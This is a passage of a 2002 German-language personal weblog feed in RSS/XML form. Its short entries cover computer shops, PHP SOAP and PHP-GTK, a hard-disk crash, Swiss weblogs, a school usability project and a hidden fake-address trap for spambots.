  16870.    <description><![CDATA[Hier eine Liste einiger Online-Shops für Computer und Zubehör:<br><br>(Reihenfolge ist rein zufällig gewählt, sagt also nichts über Qualität, Preis oder sonstige Bewertung aus!)<br><br><a href="" target="_blank"><b>Steg Computer</b></a><br><a href="" target="_blank"><b>Brack Consulting Computersysteme</b></a><br><a href="" target="_blank"><b>Byte-Line</b></a><br><a href="" target="_blank"><b>Top-D Computer Discount</b></a><br><a href="" target="_blank"><b></b></a><br><a href="" target="_blank"><b>LISTAN</b></a><br><a href="" target="_blank"><b>ARP DATACON</b></a><br><br>Mit Brack, Steg und Arp Datacon habe ich persönlich schon gute Erfahrungen gemacht; Byte-Line wurde mir von einem Kollegen sehr empfohlen; Top-D habe ich heute erst entdeckt, hat aber IMHO relativ niedrige Preise; digitec scheint mir IMHO ein bisschen teuer soll aber ein grosses Sortiment haben; bei Listan werde ich mein neues Gehäuse kaufen, überzeugt vor allem durch die niedrigen Versandkosten.<br><br>Ergänzungen sind herzlichst willkommen :-)
  16871. ]]></description>
  16872.    <content:encoded><![CDATA[Hier eine Liste einiger Online-Shops für Computer und Zubehör:<br><br>(Reihenfolge ist rein zufällig gewählt, sagt also nichts über Qualität, Preis oder sonstige Bewertung aus!)<br><br><a href="" target="_blank"><b>Steg Computer</b></a><br><a href="" target="_blank"><b>Brack Consulting Computersysteme</b></a><br><a href="" target="_blank"><b>Byte-Line</b></a><br><a href="" target="_blank"><b>Top-D Computer Discount</b></a><br><a href="" target="_blank"><b></b></a><br><a href="" target="_blank"><b>LISTAN</b></a><br><a href="" target="_blank"><b>ARP DATACON</b></a><br><br>Mit Brack, Steg und Arp Datacon habe ich persönlich schon gute Erfahrungen gemacht; Byte-Line wurde mir von einem Kollegen sehr empfohlen; Top-D habe ich heute erst entdeckt, hat aber IMHO relativ niedrige Preise; digitec scheint mir IMHO ein bisschen teuer soll aber ein grosses Sortiment haben; bei Listan werde ich mein neues Gehäuse kaufen, überzeugt vor allem durch die niedrigen Versandkosten.<br><br>Ergänzungen sind herzlichst willkommen :-)
  16873. ]]></content:encoded>
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  16877.    <title>The Wonders of PHP SOAP</title>
  16878.    <link></link>
  16879.    <guid isPermaLink="true"></guid>
  16880.    <dc:creator>Andreas Jaggi</dc:creator>
  16881.    <creativeCommons:license></creativeCommons:license>
  16882.    <pubDate>Tue, 03 Sep 2002 19:58:00 +0200</pubDate>
  16883.    <category domain="">Coding</category>
  16884.    <description><![CDATA[Wenn der Autor <a href="" target="_blank"><b>dieses Artikels</b></a> die SOAP Extension für PHP releast und mein Hoster diese Extensions installiert, wird der <b>x-log</b> auch via SOAP erreichbar sein.<br>Aber bis dahin müsst ihr euch noch gedulden. Oder ich nehme mir mal richtig Zeit um mit einer SOAP Klasse Webservices zu programmieren und anzubieten. Vielleicht wirds dann auch etwas mit meinem PHP-GTK-Client für den <b>x-log</b> :-)
  16885. ]]></description>
  16886.    <content:encoded><![CDATA[Wenn der Autor <a href="" target="_blank"><b>dieses Artikels</b></a> die SOAP Extension für PHP releast und mein Hoster diese Extensions installiert, wird der <b>x-log</b> auch via SOAP erreichbar sein.<br>Aber bis dahin müsst ihr euch noch gedulden. Oder ich nehme mir mal richtig Zeit um mit einer SOAP Klasse Webservices zu programmieren und anzubieten. Vielleicht wirds dann auch etwas mit meinem PHP-GTK-Client für den <b>x-log</b> :-)
  16887. ]]></content:encoded>
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  16891.    <title>deviantMAG</title>
  16892.    <link></link>
  16893.    <guid isPermaLink="true"></guid>
  16894.    <dc:creator>Andreas Jaggi</dc:creator>
  16895.    <creativeCommons:license></creativeCommons:license>
  16896.    <pubDate>Tue, 03 Sep 2002 11:26:00 +0200</pubDate>
  16897.    <category domain="">Webdesign</category>
  16898.    <description><![CDATA[Eine <a href="" target="_blank"><b>Website</b></a> für Designer :-)<br>IMHO siehts noch ein bisschen nach "under construction" aus. Aber dennoch schon gute Inhalte wie z.B. ein Interview mit dem Designer von <a href="" target="_blank"><b></b></a>
  16899. ]]></description>
  16900.    <content:encoded><![CDATA[Eine <a href="" target="_blank"><b>Website</b></a> für Designer :-)<br>IMHO siehts noch ein bisschen nach "under construction" aus. Aber dennoch schon gute Inhalte wie z.B. ein Interview mit dem Designer von <a href="" target="_blank"><b></b></a>
  16901. ]]></content:encoded>
  16902.  </item>
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  16905.    <title>Die *Alternative* zu Wireless</title>
  16906.    <link></link>
  16907.    <guid isPermaLink="true"></guid>
  16908.    <dc:creator>Andreas Jaggi</dc:creator>
  16909.    <creativeCommons:license></creativeCommons:license>
  16910.    <pubDate>Mon, 02 Sep 2002 23:43:00 +0200</pubDate>
  16911.    <category domain="">Networking</category>
  16912.    <description><![CDATA[<br><img alt="Cat.5 Kabelrolle" src="" width="180" height="180"><br><br>Für alle, die sich nicht der Strahlung eines Wireless Netzwerks aussetzen wollen aber trotzdem draussen im Park arbeiten wollen, gibt es jetzt eine Alternative: <b>90m Cat.5 Kabelrolle mit integriertem 8-Port Switch</b><br>Erhältlich bei <a href="" target="_blank"><b></b></a> (Prod.Nr. 230791)<br><br>Jedoch ist der Preis mit <b>CHF 899.-</b> IMHO ein bisschen sehr hoch. Da ist ein Wireless-Netz nicht viel teurer, wenn nicht sogar billiger!
  16913. ]]></description>
  16914.    <content:encoded><![CDATA[<br><img alt="Cat.5 Kabelrolle" src="" width="180" height="180"><br><br>Für alle, die sich nicht der Strahlung eines Wireless Netzwerks aussetzen wollen aber trotzdem draussen im Park arbeiten wollen, gibt es jetzt eine Alternative: <b>90m Cat.5 Kabelrolle mit integriertem 8-Port Switch</b><br>Erhältlich bei <a href="" target="_blank"><b></b></a> (Prod.Nr. 230791)<br><br>Jedoch ist der Preis mit <b>CHF 899.-</b> IMHO ein bisschen sehr hoch. Da ist ein Wireless-Netz nicht viel teurer, wenn nicht sogar billiger!
  16915. ]]></content:encoded>
  16916.  </item>
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  16919.    <title>Really Cool!</title>
  16920.    <link></link>
  16921.    <guid isPermaLink="true"></guid>
  16922.    <dc:creator>Andreas Jaggi</dc:creator>
  16923.    <creativeCommons:license></creativeCommons:license>
  16924.    <pubDate>Mon, 02 Sep 2002 00:49:00 +0200</pubDate>
  16925.    <category domain="">Misc</category>
  16926.    <description><![CDATA[<br><img alt="Coolplayer" src="" width="40" height="18"><br><br><a href="" target="_blank"><b>CoolPlayer</b></a> nennt sich dieser kleine Musicplayer. Mit entsprechenden Skins lässt er sich bis auf die oben sichtbare Grösse verkleinern und er ist erst noch GPL!
  16927. ]]></description>
  16928.    <content:encoded><![CDATA[<br><img alt="Coolplayer" src="" width="40" height="18"><br><br><a href="" target="_blank"><b>CoolPlayer</b></a> nennt sich dieser kleine Musicplayer. Mit entsprechenden Skins lässt er sich bis auf die oben sichtbare Grösse verkleinern und er ist erst noch GPL!
  16929. ]]></content:encoded>
  16930.  </item>
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  16933.    <title>Scheiss IBM</title>
  16934.    <link></link>
  16935.    <guid isPermaLink="true"></guid>
  16936.    <dc:creator>Andreas Jaggi</dc:creator>
  16937.    <creativeCommons:license></creativeCommons:license>
  16938.    <pubDate>Sun, 01 Sep 2002 21:45:00 +0200</pubDate>
  16939.    <category domain="">Misc</category>
  16940.    <description><![CDATA[Warum müssen die eigentlich ihre Festplatten immer so bauen, dass sie regelmässig jeden Monat (und zu jedem anderen ungünstigsten Zeitpunkt) den Geist aufgeben, crashen, abschmieren, sich selbst zerstören ... ?<br>Nachdem ich nun den ganzen Tag gebastelt habe läuft das System nun wieder so, dass man eine Anwendung aufstarten kann, ohne dass man gleich 2h warten muss.<br><a href=""><b>Hier</b></a> ein Screenshot nach der Defragmentierung von C:.<br>Wo ist eigentlich der Unterschied zwischen dem oberen und dem unteren Balken?<br>Scheiss Computer ...
  16941. ]]></description>
  16942.    <content:encoded><![CDATA[Warum müssen die eigentlich ihre Festplatten immer so bauen, dass sie regelmässig jeden Monat (und zu jedem anderen ungünstigsten Zeitpunkt) den Geist aufgeben, crashen, abschmieren, sich selbst zerstören ... ?<br>Nachdem ich nun den ganzen Tag gebastelt habe läuft das System nun wieder so, dass man eine Anwendung aufstarten kann, ohne dass man gleich 2h warten muss.<br><a href=""><b>Hier</b></a> ein Screenshot nach der Defragmentierung von C:.<br>Wo ist eigentlich der Unterschied zwischen dem oberen und dem unteren Balken?<br>Scheiss Computer ...
  16943. ]]></content:encoded>
  16944.  </item>
  16946.  <item>
  16947.    <title>Im Frühling spriessen die Blumen, im Herbst die Weblogs</title>
  16948.    <link></link>
  16949.    <guid isPermaLink="true"></guid>
  16950.    <dc:creator>Andreas Jaggi</dc:creator>
  16951.    <creativeCommons:license></creativeCommons:license>
  16952.    <pubDate>Sun, 01 Sep 2002 13:21:00 +0200</pubDate>
  16953.    <category domain="">Misc</category>
  16954.    <description><![CDATA[<a href="" target="_blank"><b>Hier</b></a> ist schon wieder ein CH-Weblog entstanden.
  16955. ]]></description>
  16956.    <content:encoded><![CDATA[<a href="" target="_blank"><b>Hier</b></a> ist schon wieder ein CH-Weblog entstanden.
  16957. ]]></content:encoded>
  16958.  </item>
  16960.  <item>
  16961.    <title>Spieglein, Spieglein an der Wand ..</title>
  16962.    <link></link>
  16963.    <guid isPermaLink="true"></guid>
  16964.    <dc:creator>Andreas Jaggi</dc:creator>
  16965.    <creativeCommons:license></creativeCommons:license>
  16966.    <pubDate>Fri, 30 Aug 2002 22:16:00 +0200</pubDate>
  16967.    <category domain="">Misc</category>
  16968.    <description><![CDATA[Weil <a href="" target="_blank"><b>der Spiegel</b></a> in <a href=",1518,211412,00.html" target="_blank"><b>einem Artikel</b></a> auf <a href="" target="_blank"><b>diese URL</b></a> verweist, habe ich nun ganz viele Referrers von <a href="" target="_blank"><b>dieser URL</b></a>.<br>Na dann sage ich nur eines:<br><br><span style="font-size: 20px; color: #FF0000;">Herzlich Willkommen!</span>
  16969. ]]></description>
  16970.    <content:encoded><![CDATA[Weil <a href="" target="_blank"><b>der Spiegel</b></a> in <a href=",1518,211412,00.html" target="_blank"><b>einem Artikel</b></a> auf <a href="" target="_blank"><b>diese URL</b></a> verweist, habe ich nun ganz viele Referrers von <a href="" target="_blank"><b>dieser URL</b></a>.<br>Na dann sage ich nur eines:<br><br><span style="font-size: 20px; color: #FF0000;">Herzlich Willkommen!</span>
  16971. ]]></content:encoded>
  16972.  </item>
  16974.  <item>
  16975.    <title></title>
  16976.    <link></link>
  16977.    <guid isPermaLink="true"></guid>
  16978.    <dc:creator>Andreas Jaggi</dc:creator>
  16979.    <creativeCommons:license></creativeCommons:license>
  16980.    <pubDate>Thu, 29 Aug 2002 01:41:00 +0200</pubDate>
  16981.    <category domain="">Misc</category>
  16982.    <description><![CDATA[Ein weiterer <a href=""><b>CH-Weblog</b></a>. Daher auch nicht sonderlich verwunderlich dass er auf <a href="" target="_blank"><b>sunlog</b></a> basiert :-)
  16983. ]]></description>
  16984.    <content:encoded><![CDATA[Ein weiterer <a href=""><b>CH-Weblog</b></a>. Daher auch nicht sonderlich verwunderlich dass er auf <a href="" target="_blank"><b>sunlog</b></a> basiert :-)
  16985. ]]></content:encoded>
  16986.  </item>
  16988.  <item>
  16989.    <title>Google-API</title>
  16990.    <link></link>
  16991.    <guid isPermaLink="true"></guid>
  16992.    <dc:creator>Andreas Jaggi</dc:creator>
  16993.    <creativeCommons:license></creativeCommons:license>
  16994.    <pubDate>Thu, 29 Aug 2002 01:29:00 +0200</pubDate>
  16995.    <category domain="">Coding</category>
  16996.    <description><![CDATA[Bisher hatte ich vergeblich gesucht, aber jetzt habe ich es gefunden:<br><a href="" target="_blank"><b>Hiermit</b></a> kann man auch mit PHP via SOAP auf die Google-API zugreifen.<br><br><a href="" target="_blank"><b>Hier</b></a> hat es noch viele weitere "inspirierende" PHP-Artikel :-)
  16997. ]]></description>
  16998.    <content:encoded><![CDATA[Bisher hatte ich vergeblich gesucht, aber jetzt habe ich es gefunden:<br><a href="" target="_blank"><b>Hiermit</b></a> kann man auch mit PHP via SOAP auf die Google-API zugreifen.<br><br><a href="" target="_blank"><b>Hier</b></a> hat es noch viele weitere "inspirierende" PHP-Artikel :-)
  16999. ]]></content:encoded>
  17000.  </item>
  17002.  <item>
  17003.    <title>PHP-GTK</title>
  17004.    <link></link>
  17005.    <guid isPermaLink="true"></guid>
  17006.    <dc:creator>Andreas Jaggi</dc:creator>
  17007.    <creativeCommons:license></creativeCommons:license>
  17008.    <pubDate>Thu, 29 Aug 2002 01:18:00 +0200</pubDate>
  17009.    <category domain="">Coding</category>
  17010.    <description><![CDATA[Und <a href="" target="_blank"><b>hier</b></a> noch eine Einführung in PHP-GTK. Inklusive einem simplen GUI für MySQL.
  17011. ]]></description>
  17012.    <content:encoded><![CDATA[Und <a href="" target="_blank"><b>hier</b></a> noch eine Einführung in PHP-GTK. Inklusive einem simplen GUI für MySQL.
  17013. ]]></content:encoded>
  17014.  </item>
  17016.  <item>
  17017.    <title>Eigenes Session Management</title>
  17018.    <link></link>
  17019.    <guid isPermaLink="true"></guid>
  17020.    <dc:creator>Andreas Jaggi</dc:creator>
  17021.    <creativeCommons:license></creativeCommons:license>
  17022.    <pubDate>Thu, 29 Aug 2002 01:04:00 +0200</pubDate>
  17023.    <category domain="">Coding</category>
  17024.    <description><![CDATA[<a href="" target="_blank"><b>Dieser Artikel</b></a> beschreibt, wie man mit PHP ein eigenes Session Management programmieren kann; ohne $_SESSION['???'] zu benützen.
  17025. ]]></description>
  17026.    <content:encoded><![CDATA[<a href="" target="_blank"><b>Dieser Artikel</b></a> beschreibt, wie man mit PHP ein eigenes Session Management programmieren kann; ohne $_SESSION['???'] zu benützen.
  17027. ]]></content:encoded>
  17028.  </item>
  17030.  <item>
  17031.    <title></title>
  17032.    <link></link>
  17033.    <guid isPermaLink="true"></guid>
  17034.    <dc:creator>Andreas Jaggi</dc:creator>
  17035.    <creativeCommons:license></creativeCommons:license>
  17036.    <pubDate>Tue, 27 Aug 2002 14:27:00 +0200</pubDate>
  17037.    <category domain="">Linux</category>
  17038.    <description><![CDATA[<a href="" target="_blank"><b>Hier</b></a> hat es viele vielfältige Informationen über Linux, insbesondere einen IMHO detaillierten Bereich über Mini Distributionen.
  17039. ]]></description>
  17040.    <content:encoded><![CDATA[<a href="" target="_blank"><b>Hier</b></a> hat es viele vielfältige Informationen über Linux, insbesondere einen IMHO detaillierten Bereich über Mini Distributionen.
  17041. ]]></content:encoded>
  17042.  </item>
  17044.  <item>
  17045.    <title>1.</title>
  17046.    <link></link>
  17047.    <guid isPermaLink="true"></guid>
  17048.    <dc:creator>Andreas Jaggi</dc:creator>
  17049.    <creativeCommons:license></creativeCommons:license>
  17050.    <pubDate>Tue, 27 Aug 2002 14:21:00 +0200</pubDate>
  17051.    <category domain="">Misc</category>
  17052.    <description><![CDATA[<a href=""><b>Das</b></a> ist wieder einmal eine erfreuliche Überraschung :-)
  17053. ]]></description>
  17054.    <content:encoded><![CDATA[<a href=""><b>Das</b></a> ist wieder einmal eine erfreuliche Überraschung :-)
  17055. ]]></content:encoded>
  17056.  </item>
  17058.  <item>
  17059.    <title>Maturaarbeit - Praxis</title>
  17060.    <link></link>
  17061.    <guid isPermaLink="true"></guid>
  17062.    <dc:creator>Andreas Jaggi</dc:creator>
  17063.    <creativeCommons:license></creativeCommons:license>
  17064.    <pubDate>Mon, 26 Aug 2002 21:33:00 +0200</pubDate>
  17065.    <category domain="">School</category>
  17066.    <description><![CDATA[Im Zuge meiner Maturaarbeit zum Thema Usability entsteht <a href=""><b>hier</b></a> eine benutzerfreundlichere Version <a href="" target="_blank"><b>dieser</b></a> Website.<br>Kritik ist herzlich willkommen :-)
  17067. ]]></description>
  17068.    <content:encoded><![CDATA[Im Zuge meiner Maturaarbeit zum Thema Usability entsteht <a href=""><b>hier</b></a> eine benutzerfreundlichere Version <a href="" target="_blank"><b>dieser</b></a> Website.<br>Kritik ist herzlich willkommen :-)
  17069. ]]></content:encoded>
  17070.  </item>
  17072.  <item>
  17073.    <title>Dosenfleisch - Spam!</title>
  17074.    <link></link>
  17075.    <guid isPermaLink="true"></guid>
  17076.    <dc:creator>Andreas Jaggi</dc:creator>
  17077.    <creativeCommons:license></creativeCommons:license>
  17078.    <pubDate>Sat, 24 Aug 2002 01:53:00 +0200</pubDate>
  17079.    <category domain="">Misc</category>
  17080.    <description><![CDATA[<a href="" target="_blank"><b>Der Schockwellenreiter</b></a> hat einen innovative Idee im alltäglichen Krieg gegen Spam(bots). Basierend auf <a href="" target="_blank"><b>einem Artikel von</b></a>.<br><a href="" target="_blank"><b>Pepino</b></a> hat auch schon <a href="" target="_blank"><b>ein passendes PHP-Script</b></a> geschrieben.<br><br>Hier nun ein paar Fake-Adressen: (muss mir noch überlegen, wie ich die tägliche Ration davon irgendwo sinnvoll intergrieren kann :-)<br><br><span style="font-size: 8px;"><a href="" style="color: #FFFF00;"><b></b></a>, <a href="" style="color: #FFFF11;"><b></b></a>, <a href="" style="color: #FFFF22;"><b></b></a>, <a href="" style="color: #FFFF33;"><b></b></a>, <a href="" style="color: #FFFF33;"><b></b></a>, <a href="" style="color: #FFFF44;"><b></b></a>, <a href="" style="color: #FFFF55;"><b></b></a>, <a href="" style="color: #FFFF66;"><b></b></a>, <a href="" style="color: #FFFF66;"><b></b></a>, <a href="" style="color: #FFFF77;"><b></b></a>, <a href="" style="color: #FFFF88;"><b></b></a>, <a href="" style="color: #FFFF99;"><b></b></a>, <a href="" style="color: #FFFF99;"><b></b></a>, <a href="" style="color: #FFFFAA;"><b></b></a>, <a href="" style="color: #FFFFBB;"><b></b></a>, <a href="" style="color: #FFFFCC;"><b></b></a>, <a href="" style="color: #FFFFCC;"><b></b></a>, <a href="" style="color: #FFFFDD;"><b></b></a>, <a href="" style="color: #FFFFEE;"><b></b></a>, <a href="" style="color: #FFFFFF;"><b></b></a></span>
  17081. ]]></description>
  17082.    <content:encoded><![CDATA[<a href="" target="_blank"><b>Der Schockwellenreiter</b></a> hat einen innovative Idee im alltäglichen Krieg gegen Spam(bots). Basierend auf <a href="" target="_blank"><b>einem Artikel von</b></a>.<br><a href="" target="_blank"><b>Pepino</b></a> hat auch schon <a href="" target="_blank"><b>ein passendes PHP-Script</b></a> geschrieben.<br><br>Hier nun ein paar Fake-Adressen: (muss mir noch überlegen, wie ich die tägliche Ration davon irgendwo sinnvoll intergrieren kann :-)<br><br><span style="font-size: 8px;"><a href="" style="color: #FFFF00;"><b></b></a>, <a href="" style="color: #FFFF11;"><b></b></a>, <a href="" style="color: #FFFF22;"><b></b></a>, <a href="" style="color: #FFFF33;"><b></b></a>, <a href="" style="color: #FFFF33;"><b></b></a>, <a href="" style="color: #FFFF44;"><b></b></a>, <a href="" style="color: #FFFF55;"><b></b></a>, <a href="" style="color: #FFFF66;"><b></b></a>, <a href="" style="color: #FFFF66;"><b></b></a>, <a href="" style="color: #FFFF77;"><b></b></a>, <a href="" style="color: #FFFF88;"><b></b></a>, <a href="" style="color: #FFFF99;"><b></b></a>, <a href="" style="color: #FFFF99;"><b></b></a>, <a href="" style="color: #FFFFAA;"><b></b></a>, <a href="" style="color: #FFFFBB;"><b></b></a>, <a href="" style="color: #FFFFCC;"><b></b></a>, <a href="" style="color: #FFFFCC;"><b></b></a>, <a href="" style="color: #FFFFDD;"><b></b></a>, <a href="" style="color: #FFFFEE;"><b></b></a>, <a href="" style="color: #FFFFFF;"><b></b></a></span>
  17083. ]]></content:encoded>
  17084.  </item>
  17086.  <item>
  17087.    <title>Da kriegt man den Mund gar nicht mehr zu!</title>
  17088.    <link></link>
  17089.    <guid isPermaLink="true"></guid>
  17090.    <dc:creator>Andreas Jaggi</dc:creator>
  17091.    <creativeCommons:license></creativeCommons:license>
  17092.    <pubDate>Thu, 22 Aug 2002 20:21:00 +0200</pubDate>
  17093.    <category domain="">Tech</category>
  17094.    <description><![CDATA[Beim <a href="" target="_blank"><b>Webshop von</b></a>  hat es viele schöne Gehäuse.<br>Das hier ist mein Favorit:<br><br><img alt="Avance Case" src="">
  17095. ]]></description>
  17096.    <content:encoded><![CDATA[Beim <a href="" target="_blank"><b>Webshop von</b></a>  hat es viele schöne Gehäuse.<br>Das hier ist mein Favorit:<br><br><img alt="Avance Case" src="">
  17097. ]]></content:encoded>
  17098.  </item>
  17100.  <item>
  17101.    <title>Build Your Linux Disk</title>
  17102.    <link></link>
  17103.    <guid isPermaLink="true"></guid>
  17104.    <dc:creator>Andreas Jaggi</dc:creator>
  17105.    <creativeCommons:license></creativeCommons:license>
  17106.    <pubDate>Thu, 22 Aug 2002 00:32:00 +0200</pubDate>
  17107.    <category domain="">Linux</category>
  17108.    <description><![CDATA[<a href="" target="_blank"><b>Damit</b></a> kann man sich eine lauffähige, wenn auch sehr abgespeckte, Linux-Distribution auf <b>einer</b> Diskette erstellen.<br>Wenn ich einmal Zeit finde(n werde), könnte ich ja versuchen, mir eine Disk zu basteln mit Netzwerktools und Samba.<br>Würde den W2k-"Administrator" des Gymnasiums - der Lehrer, welcher weiss, wie und wo man den Computer einschaltet - sicherlich ganz besonders freuen, wenn nebst den andauernd gamenden "Terzis" (was <b>verboten</b> ist liebe Mitschüler!) auch noch so ein PC-Freak mit Linux anmarschiert.
  17109. ]]></description>
  17110.    <content:encoded><![CDATA[<a href="" target="_blank"><b>Damit</b></a> kann man sich eine lauffähige, wenn auch sehr abgespeckte, Linux-Distribution auf <b>einer</b> Diskette erstellen.<br>Wenn ich einmal Zeit finde(n werde), könnte ich ja versuchen, mir eine Disk zu basteln mit Netzwerktools und Samba.<br>Würde den W2k-"Administrator" des Gymnasiums - der Lehrer, welcher weiss, wie und wo man den Computer einschaltet - sicherlich ganz besonders freuen, wenn nebst den andauernd gamenden "Terzis" (was <b>verboten</b> ist liebe Mitschüler!) auch noch so ein PC-Freak mit Linux anmarschiert.
  17111. ]]></content:encoded>
  17112.  </item>
  17114.  <item>
  17115.    <title>Wie geht's?</title>
  17116.    <link></link>
  17117.    <guid isPermaLink="true"></guid>
  17118.    <dc:creator>Andreas Jaggi</dc:creator>
  17119.    <creativeCommons:license></creativeCommons:license>
  17120.    <pubDate>Tue, 20 Aug 2002 17:22:00 +0200</pubDate>
  17121.    <category domain="">Misc</category>
  17122.    <description><![CDATA[Für alle Spiesser und Spiesserinnen und all jene, welche nicht dazu verkommen wollen ;-)<br><br><a href="" target="_blank"><b>Wie geht's?</b></a> <br><br><b>Update:</b> Leider darf ich feststellen, dass die Seite momentan nicht gefunden werden will. Hoffentlich zeigt sie sich bald wieder :-)
  17123. ]]></description>
  17124.    <content:encoded><![CDATA[Für alle Spiesser und Spiesserinnen und all jene, welche nicht dazu verkommen wollen ;-)<br><br><a href="" target="_blank"><b>Wie geht's?</b></a> <br><br><b>Update:</b> Leider darf ich feststellen, dass die Seite momentan nicht gefunden werden will. Hoffentlich zeigt sie sich bald wieder :-)
  17125. ]]></content:encoded>
  17126.  </item>
  17128.  <item>
  17129.    <title>Trau nur einer Statistik, die du selbst gefälscht hast.</title>
  17130.    <link></link>
  17131.    <guid isPermaLink="true"></guid>
  17132.    <dc:creator>Andreas Jaggi</dc:creator>
  17133.    <creativeCommons:license></creativeCommons:license>
  17134.    <pubDate>Mon, 19 Aug 2002 23:38:00 +0200</pubDate>
  17135.    <category domain="">Misc</category>
  17136.    <description><![CDATA[Nun kann man unter Statistik noch ein weiteres Diagramm finden: Die Verteilung meiner Postings auf die verschiedenen Kategorien.<br><br>Mit 32 Posts führt (oh wie erstaunlich ;-) die Kategorie Misc. Gleich dahinter folgt Linux *freu*. Danach Webdesign, Coding und die restlichen scheinbar unbeliebten Kategorien.<br>(Stimmt natürlich nicht. Mein CMS ist halt noch nicht soweit, das es veröffentlich werden kann)
  17137. ]]></description>
  17138.    <content:encoded><![CDATA[Nun kann man unter Statistik noch ein weiteres Diagramm finden: Die Verteilung meiner Postings auf die verschiedenen Kategorien.<br><br>Mit 32 Posts führt (oh wie erstaunlich ;-) die Kategorie Misc. Gleich dahinter folgt Linux *freu*. Danach Webdesign, Coding und die restlichen scheinbar unbeliebten Kategorien.<br>(Stimmt natürlich nicht. Mein CMS ist halt noch nicht soweit, das es veröffentlich werden kann)
  17139. ]]></content:encoded>
  17140.  </item>
  17142.  <item>
  17143.    <title>Netscape 2.02</title>
  17144.    <link></link>
  17145.    <guid isPermaLink="true"></guid>
  17146.    <dc:creator>Andreas Jaggi</dc:creator>
  17147.    <creativeCommons:license></creativeCommons:license>
  17148.    <pubDate>Mon, 19 Aug 2002 22:05:00 +0200</pubDate>
  17149.    <category domain="">Webdesign</category>
  17150.    <description><![CDATA[Für meine Maturaarbeit benötige ich zum Testen eine alten/älteren Netscape Browser. Nach einer unendlich langen Klickerei, bin ich <a href="" target="_blank"><b>hier</b></a> fündig geworden. Dort gibts von Netcape 2.02 bis 6.2.3 alles was das Herz begehrt.
  17151. ]]></description>
  17152.    <content:encoded><![CDATA[Für meine Maturaarbeit benötige ich zum Testen eine alten/älteren Netscape Browser. Nach einer unendlich langen Klickerei, bin ich <a href="" target="_blank"><b>hier</b></a> fündig geworden. Dort gibts von Netcape 2.02 bis 6.2.3 alles was das Herz begehrt.
  17153. ]]></content:encoded>
  17154.  </item>
  17156.  <item>
  17157.    <title>Zaurus-Flash</title>
  17158.    <link></link>
  17159.    <guid isPermaLink="true"></guid>
  17160.    <dc:creator>Andreas Jaggi</dc:creator>
  17161.    <creativeCommons:license></creativeCommons:license>
  17162.    <pubDate>Mon, 19 Aug 2002 12:14:00 +0200</pubDate>
  17163.    <category domain="">Linux</category>
  17164.    <description><![CDATA[<a href="" target="_blank"><b>Hier</b></a> findet man eine Flash-Präsentation des Sharp Zaurus. :-)
  17165. ]]></description>
  17166.    <content:encoded><![CDATA[<a href="" target="_blank"><b>Hier</b></a> findet man eine Flash-Präsentation des Sharp Zaurus. :-)
  17167. ]]></content:encoded>
  17168.  </item>
  17170.  <item>
  17171.    <title>Mensch ärgere dich nicht</title>
  17172.    <link></link>
  17173.    <guid isPermaLink="true"></guid>
  17174.    <dc:creator>Andreas Jaggi</dc:creator>
  17175.    <creativeCommons:license></creativeCommons:license>
  17176.    <pubDate>Sun, 18 Aug 2002 15:36:00 +0200</pubDate>
  17177.    <category domain="">Misc</category>
  17178.    <description><![CDATA[Zufällig habe ich <a href=";category_id=60" target="_blank"><b>einen Artikel</b></a> gefunden, welcher das Thema Videogames endlich einmal annähernd neutral angeht.<br>(Nicht so wie die Beiträge der Hass-Kampagne nach dem Amoklauf von Erfurt, welche auf Vermutungen und ohne Recherchen geschrieben wurden.)
  17179. ]]></description>
  17180.    <content:encoded><![CDATA[Zufällig habe ich <a href=";category_id=60" target="_blank"><b>einen Artikel</b></a> gefunden, welcher das Thema Videogames endlich einmal annähernd neutral angeht.<br>(Nicht so wie die Beiträge der Hass-Kampagne nach dem Amoklauf von Erfurt, welche auf Vermutungen und ohne Recherchen geschrieben wurden.)
  17181. ]]></content:encoded>
  17182.  </item>
  17184.  <item>
  17185.    <title>baaa!</title>
  17186.    <link></link>
  17187.    <guid isPermaLink="true"></guid>
  17188.    <dc:creator>Andreas Jaggi</dc:creator>
  17189.    <creativeCommons:license></creativeCommons:license>
  17190.    <pubDate>Sun, 18 Aug 2002 14:49:00 +0200</pubDate>
  17191.    <category domain="">Misc</category>
  17192.    <description><![CDATA[You are a - Goth Sheep!<br>Black is the new black, don't you know. All you happy people scare me.<br><br><img alt="Goth" src=""><br><br>Das ist das Ergebniss <a href="" target="new"><b>dieses Tests</b></a>.<br>Wobei mir nicht ganz klar ist, weshalb ich ein Gothic sein soll, nur weil ich mich schwarz kleide?
  17193. ]]></description>
  17194.    <content:encoded><![CDATA[You are a - Goth Sheep!<br>Black is the new black, don't you know. All you happy people scare me.<br><br><img alt="Goth" src=""><br><br>Das ist das Ergebniss <a href="" target="new"><b>dieses Tests</b></a>.<br>Wobei mir nicht ganz klar ist, weshalb ich ein Gothic sein soll, nur weil ich mich schwarz kleide?
  17195. ]]></content:encoded>
  17196.  </item>
  17198.  <item>
  17199.    <title>PHPDoc</title>
  17200.    <link></link>
  17201.    <guid isPermaLink="true"></guid>
  17202.    <dc:creator>Andreas Jaggi</dc:creator>
  17203.    <creativeCommons:license></creativeCommons:license>
  17204.    <pubDate>Sat, 17 Aug 2002 18:27:00 +0200</pubDate>
  17205.    <category domain="">Coding</category>
  17206.    <description><![CDATA[<a href="" target="_blank"><b>Diesen Artikel</b></a> über PHPDoc muss ich mir merken. Könnte nützlich sei für meine Maturaarbeit.
  17207. ]]></description>
  17208.    <content:encoded><![CDATA[<a href="" target="_blank"><b>Diesen Artikel</b></a> über PHPDoc muss ich mir merken. Könnte nützlich sei für meine Maturaarbeit.
  17209. ]]></content:encoded>
  17210.  </item>
  17212.  <item>
  17213.    <title>PHP-GTK</title>
  17214.    <link></link>
  17215.    <guid isPermaLink="true"></guid>
  17216.    <dc:creator>Andreas Jaggi</dc:creator>
  17217.    <creativeCommons:license></creativeCommons:license>
  17218.    <pubDate>Sat, 17 Aug 2002 03:28:00 +0200</pubDate>
  17219.    <category domain="">Coding</category>
  17220.    <description><![CDATA[Nachdem ich nun schon vielerorts von PHP-GTK gelesen habe, habe ich nun dieses <a href="" target="_blank"><b>graphische Zeugs</b></a> installiert.<br>(Mit Hilfe <a href="" target="_blank"><b>dieses</b></a> Tutorials war es gar nicht schwer :-)<br><br>Bis jetzt funktionierts IMHO gut. Nun muss ich sehen, wie ich mit der GUI-Programmierung zurechtkommen kann ;-)
  17221. ]]></description>
